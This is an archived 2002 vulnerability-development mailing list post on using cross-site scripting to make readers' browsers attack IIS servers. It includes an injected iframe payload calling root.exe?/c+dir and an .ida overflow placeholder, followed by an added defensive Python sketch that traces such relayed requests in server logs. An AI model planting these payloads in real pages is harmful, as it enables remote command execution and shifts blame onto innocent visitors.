Vulnerability Development mailing list archives
New thoughts on CSS
From: "Brett Moore" <brett () softwarecreations co nz>
Date: Sat, 2 Feb 2002 11:24:51 +1300
People are talking about CSS, yes still after many years it is a security problem. Some people say 'what sort of a problem, yes you can steal cookies but what else?', So how about new ideas.

How about using CSS to exploit vulnerabilities in web sites, with some degree of anonymity.

Example:
hello.asp takes 1 parameter (name) that is displayed to the screen with no cleansing.

/hello.asp?name = <iframe src=http://vuln.iis.server/scripts/root.exe?/c+dir></iframe>

I used iframe in the example as it shows something visible on the screen. But an attacker would need no response from the server so image tags etc are all viable.

Example Scenario.
-----------------
Web board has CSS and also runs vuln iis.
Attacker posts message with css exploit that kills the server.
User comes along, reads message and user's ip gets logged as killing the server.
This could even be set to kill a different iis server.
------------------

Feedback is requested of course, and perhaps somebody will have time and energy to test further.

How about other exploits? Custom made .ida overflow code

<iframe src=http://vuln.iis.server/a.ida?XXX....XXX{CUSTOM IDA OVERFLOW CODE}></iframe>

Brett
-----Original Message-----
From: E M [mailto:rdnktrk () hotmail com]
Sent: Saturday, 2 February 2002 08:14
To: billp () boarder org; vuln-dev () securityfocus com
Subject: Re: CSS, CSS & let me give you some more CSS

I think we are getting away from the original topic, CSS and how it affects you. Basically the general agreement is that cookie stealing via embedded code is the most dangerous use for CSS and the most common.
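
Added example, not part of the original post: a log-triage sketch for the scenario above, where the client IP in the server log belongs to a reader of the web board rather than to whoever posted the markup. It assumes the server logs cs(Referer) in W3C extended format; the log lines and the host board.example are constructed, and the sensitive paths are the ones named in the post.

```python
import re
from urllib.parse import urlsplit

# Constructed sample lines in W3C extended log format (not from the post).
# board.example and all IP addresses are placeholders.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
2002-02-02 10:01:12 192.0.2.10 GET /default.htm - 200 -
2002-02-02 10:02:40 192.0.2.44 GET /scripts/root.exe /c+dir 200 http://board.example/read.asp?msg=17
2002-02-02 10:02:55 192.0.2.77 GET /scripts/root.exe /c+dir 200 http://board.example/read.asp?msg=17
2002-02-02 10:03:30 198.51.100.5 GET /scripts/root.exe /c+dir 404 -
2002-02-02 10:04:02 192.0.2.10 GET /images/logo.gif - 200 http://vuln.iis.server/default.htm
"""

OWN_HOSTS = {"vuln.iis.server"}                      # hosts this server answers for
SENSITIVE = re.compile(r"^/scripts/|\.ida$", re.I)   # paths named in the post


def parse(log_text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))


def relayed_requests(log_text, own_hosts=OWN_HOSTS):
    """Group sensitive-path hits by the third-party page that referred them.

    Several unrelated client IPs sharing one external referring page suggest
    the requests were triggered by markup on that page, so the page (and who
    posted to it) is the lead to follow, not the individual client IPs.
    """
    by_page = {}
    for rec in parse(log_text):
        ref = rec.get("cs(Referer)", "-")
        if ref == "-" or not SENSITIVE.search(rec["cs-uri-stem"]):
            continue
        host = urlsplit(ref).hostname
        if host and host not in own_hosts:
            by_page.setdefault(ref, []).append(rec["c-ip"])
    return by_page


if __name__ == "__main__":
    for page, clients in relayed_requests(SAMPLE_LOG).items():
        print(f"{page}: {len(clients)} client(s) {clients}")
```

A missing Referer does not clear a request, since the header can be absent or stripped; the grouping only adds evidence when it is present.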